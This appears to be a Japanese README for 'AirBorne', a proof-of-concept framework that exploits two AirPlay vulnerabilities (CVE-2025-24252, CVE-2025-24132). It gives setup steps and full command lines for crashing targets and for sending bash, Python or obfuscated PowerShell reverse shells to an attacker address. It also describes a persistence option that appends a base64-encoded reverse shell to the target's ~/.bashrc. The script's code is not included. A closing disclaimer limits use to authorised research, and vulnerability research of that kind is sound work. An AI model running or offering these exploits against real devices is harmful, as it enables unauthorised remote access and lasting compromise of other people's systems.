
CVE-2025-24252 および CVE-2025-24132 の PoC
CVE-2025-24252 & CVE-2025-24132 用の完全な PoC フレームワーク
ekomsSavior 作 |
AirBorne は、Apple の AirPlay サービスにおける 2 つの深刻な脆弱性を標的とした、統合型の概念実証 (PoC) フレームワークです。完全なクラッシュトリガーと、オプションの永続化、リスナー、複数のペイロード形式を備えた動作するリバースシェルエクスプロイトが、すべて 1 つのスクリプトに含まれています。
オリジナル版をお探しですか?
レガシー版は、このリポジトリのlegacyブランチで引き続き入手できます。
チェックアウトするには:
git checkout legacy
.bashrc インジェクション (Linux) を使用したオプションの永続化を含みますgit clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
単一のスクリプト airborne.py に、両方の PoC とすべてのロジックが含まれています:
--exploit で CVE を選択--payload でリバースシェルペイロードを設定--persistent でターゲット上の永続化をオプションで有効化sudo python3 airborne.py --exploit 24252 --interface wlan0
モニターモードのインターフェースが必要です。
デフォルトの bash シェルで完全なエクスプロイトを開始:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
代わりに Python シェルを選択:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
Linux ターゲットで実際の永続化を有効化:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
シェルコマンドインジェクションのみ
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| ペイロード | 説明 |
|---|---|
bash | TCP 経由のデフォルトの bash リバースシェル |
python | socket と pty を使用した Python ベースのリバースシェル |
powershell | 完全な Windows PowerShell RCE ペイロード (難読化済み) |
--persistent を使用すると、スクリプトはエンコードされたリバースシェルペイロードをターゲットの以下に追記します:
~/.bashrc
これにより、ユーザーがログインするかターミナルが起動されるたびに、シェルが返されます。
base64 でエンコードされ、バッファオーバーフローの後に配信されますこのプロジェクトは、教育、倫理、および許可された研究のみを目的としています。
システムへの許可のない悪用は違法かつ非倫理的です。